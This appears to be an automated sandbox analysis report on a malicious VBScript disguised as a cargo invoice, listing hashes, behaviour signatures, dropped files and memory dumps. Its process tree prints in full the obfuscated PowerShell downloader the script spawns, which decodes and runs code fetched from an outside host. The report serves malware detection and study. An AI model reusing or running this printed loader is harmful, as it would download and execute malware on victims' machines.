Overview

overview

10

Static

static

1

CargoInvoi...21.vbs

windows7-x64

8

CargoInvoi...21.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    299s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 06:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CargoInvoice_Outstanding_56789_2024-11-21.vbs

  • Size

    38KB

  • MD5

    e221e50773f32bab23fcf3d130c68481

  • SHA1

    350bd0a28a1cbffb8a9e4f9075cec81895798a80

  • SHA256

    602003e98421ce67063784195fd50caa107f895549f55efc60bf569e605f61f2

  • SHA512

    6c846e5b6a6c835511cfb7823516163ba9f1056e7ac2159e73a059b29bfc75b102c43f8779330a220fbffcaf0708e5c47aa6a5947beb983d1fa954fbe337de3e

  • SSDEEP

    768:IZLtB89wlVgpDAus1yZUR/eGR4/3yLohsVgIij/+gHxWseNAeonfre7st2r:IZJB8rDds1yGRm+4/kLiD+goRNAnXtu

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CargoInvoice_Outstanding_56789_2024-11-21.vbs"
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3020
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Predenying Kloakeringsarbejde Chambrierers Urbaniteten persongruppers Alhandal #><#Telegrafvsnets Metallurgy sundari Kvlning Bleachyard Charlataneriet #>$Omringede='Kommandoaktions';function Cypseliform($Foretagendes){If ($host.DebuggerEnabled) {$Ureteropyelitis=3} for ($Arther85=$Ureteropyelitis;;$Arther85+=4){if(!$Foretagendes[$Arther85]) { break }$Dewaters+=$Foretagendes[$Arther85]}$Dewaters}function Pattede($Overanstrengelses){ .($Histography) ($Overanstrengelses)}$serievarerne=Cypseliform ' UsN Afe .htLgm.OnowCl,e BoBPlecsitLAkkIFo etwin oct';$sprogforskernes=Cypseliform ',mpMFoloCanz seiEl lelels gaNat/';$Metabolisme=Cypseliform 'Di TNatlknasTr,1Teg2';$Damaskduge36='Tel[Conn kuEPaaTTi,.dumsNunEsp.rPrevdelIUnmCGamENaupKatoFori .rNCirt iMranA enNBenAsprGante GrRAnd] Br:s,a:AntsDe ERavClg.UF rrUnmIRobtvanYAntpUkarE ro RetFlhoOveC hio Fil,it=Ana$.rgMT,ueI fT stARe,bGlio,haLD ciFixsEn,MFave';$sprogforskernes+=Cypseliform 'spe5Aho. Pn0 B. r(UneWPeriPlanWeed ,ioGalwB,ns n AntNZygT T sul1Ove0 .u. r0 Wh;Gip AadWGamiUmrn sa6Be,4Cha;saz Fesxsr 6 Na4Uds;sta Ignr s vkon: Bo1.ef3Fr 1 E .Til0Mel) fu D,pGsl eBlocDeskN tosko/ tr2ski0 Di1 el0 oo0bro1Gaa0str1Fil Ty FJavitrarForeFarfNago EkxU s/N t1say3ski1 Ac.Pas0';$Roomies=Cypseliform ' s UK ms ReePinRMul-NitaUnpgTndeP.an ot';$spyttekummerne=Cypseliform 'DrahR stCints mpF rs re:Hjt/Fej/ForbNa 9tilaTa,1sub..asiY gcTriu rs/UndXL br KoCChaG beXFo.V esfKabsHol/selTMinr isuOkas PitslulFnoeKli2 Ge0Rec.c.eaE tssubd';$supercanonical=Cypseliform ' ,v>';$Histography=Cypseliform 'stai KbeProX';$saliences109='Perfiditet';$fabaceae='\Afprikningen.Bss';Pattede (Cypseliform 'h i$GoigConL hoOPanBMisAParLLen:AfbEdriKDras toasteMs.eELacnT lsU dssu T s.T ,oEleiTpro= l$LigE H,NHerVP l: seA ,aPP ePNasDDraaIntt,ibA e+Des$RacfordaswiBW naEbuCHypEMolALege');Pattede (Cypseliform 'Ano$sc,GU gl,adospebaktaUdllU d:Da,bRe.uBrynunpITrinCoogB,iE airNatNFlaEUnhsPar=Cub$Af sYeoPFriYu at sTB geKn KUncuLurm BuMGloETrarDi n HuEt i.Fifs InPBanL.ili AnTRes( Ja$ lasZomUMyrP skEPenrArtCEvaa C nrevoskln Cri ykCDraA MeLBil)');Pattede (Cypseliform $Damaskduge36);$spyttekummerne=$Buningernes[0];$Antagonization130=(Cypseliform 'Pos$BaggA ilBreOUnvbAlbasclLsyk:si.a M tTo CPr =sumNsulECarWCy,-ZebOconb ajPh E JaCshat Ra Pers suy rmsBe tM,keUp mBor.Dep$Unas pleEndr fvIRetE.rnVRabAOplR V.E ncRAntnsjle');Pattede ($Antagonization130);Pattede (Cypseliform 'ges$ ,yAs atColcfor.DagHspreTa,a ord rieTo rBris e[Lan$ BiR,ytoOveoK.gm AliRe eudlsIct]Oof=Adm$T ps iprearClaoAwfgswaf FjoOrdrsphsDdmkR,neIndrPhynT reCo.s');$Civicism=Cypseliform ' s $BlrAEsttsupc ik.,irD,eaoPi wFr nLarlAnaodiaaBold.ecFHaviImml C es,e(Fri$Fors Uppsp.yThotOdyt eeGibkCleu fsmLasm MeevirrCrinVeneR g,a l$DisK stoM rk re ,yt P t R e BlrMaje Fot k )';$Koketteret=$Eksamenssttet;Pattede (Cypseliform 'Udd$.rugAlvlOblosasBDevACluLLi :Elav nivokrseru ulA aeDeiN slsVile Bun,ph=Lok(F.uT V e ResDu Tspl-Begp LiABestU phTil Bi.$RehK Vao GekskresavTEcttMi e BlRstjE aTC,r)');while (!$Virulensen) {Pattede (Cypseliform 'Reb$UnsgUnflBgeo arbMyoaimpl Fo: pak BluD wnMims M t.ipfDecoF ir ursUnetRumaNednClidFla=Fje$ GuU rok UneMesnsged .weMajlMe iDu gLashUnaePand') ;Pattede $Civicism;Pattede (Cypseliform 'C,ts LoTCenAGa R .uTImp-F rs Mol MiEUnpEkaePBol M.o4');Pattede (Cypseliform 'Lin$samg ChLsprO ab BuAK,nLdis:ReuVMrkiBehRB.fu Del Unesn.nbrys oe rNEry=.or(Pr tUnee ersFreT Kv-stapma aud,TEl.hP r ,fv$R cK oroBeeKskbekulTspotM re dR.ule sptDyr)') ;Pattede (Cypseliform 'Pyr$AlcG stl oOsi BEx asamls,r:UnstafbiD uO V lFulOUr gGyniCloEB,sn Bes Co=Co,$H.rGBoll Tiose b seAPool hr:.dbm C,e KoTMelastiGHy ABals tjTh eECe.rCon+Es +Adn% .o$LigB auAsyNP oI sknNdrgNipEGrerM,snBureC,rs or. N cHano irUrowN .lt') ;$spyttekummerne=$Buningernes[$Tiologiens]}$straighted=312945;$sprngbombes=29375;Pattede (Cypseliform ' G $HerGturl RtoVi B DrA LelT,i:HvnmBruAChiCBasrDeboTasCPenEshiP ndHAleADamlV dO PauP esRe, En=Coa Kodg R ETiltPre-sk C ndOsubn ittErseBrnn I.Tskr Ben$R gK s oImpk roeAbsTKasT UdECapRb geForT');Pattede (Cypseliform 'Alv$slagKlul Fio subLy,aBagl il: ,oRH.reK.rssp,bgenoPoslU iiU,dgcivs Gy Rub= Fn Man[ nts E ysersV rt Beed,nmCir.OveCDisoillnR vv sheNedr omtDe.] ak:Reg: frFAmerAd oIchm DrB exaK tsNecesam6sem4Dens stVolrCo.i Tyn.atg .a(Kar$U eMProa nscDy,r muoJazcPere kp Kvh C.aMellPoko ulu ,lsBat)');Pattede (Cypseliform 'sp.$TrkGLe Lt,mOVirb D,aTilLFor:Hy bOrilF,raGredDolsKrymBe,RIndeJugRHyleErhssoc Hyp= na Rev[JausPl,ysk sPalt AbeRy.m Ca. s tTitEDomX amT Ar.ZareF,jN rCHinOR iDnatICh n Mig In]Ka :Tr : vraBefssagC K,IPerIAnt.RejgscoE ,ctM lsBortHa rChris mnselg Va( R $PlarskaeCh sPo,BUndoA llOpsisp.GDy.sLex)');Pattede (Cypseliform 'Ru $Gragd.ml cpORefbU raDisLYur: gesRo,P UdgL dE,igsEt =spa$DolbUngltaca U dAf sPapM KvrskoEs mR.one Bas M .Tousgrau RhBI,ys AntBesr F IGo nQuogs.l(Cho$Vars betGlarsnuaDraIsw,gUayHMustRygE ,eDUdh,Unc$ K.s ecpAg.R E n egg FoB AlOVigmcrebetee Grs ag)');Pattede $spges;"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1688

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabA7B6.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarA7D8.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • memory/1688-52-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1688-53-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1688-54-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1688-55-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-56-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-59-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-58-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-57-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-60-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-61-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1688-62-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-63-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-64-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-65-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download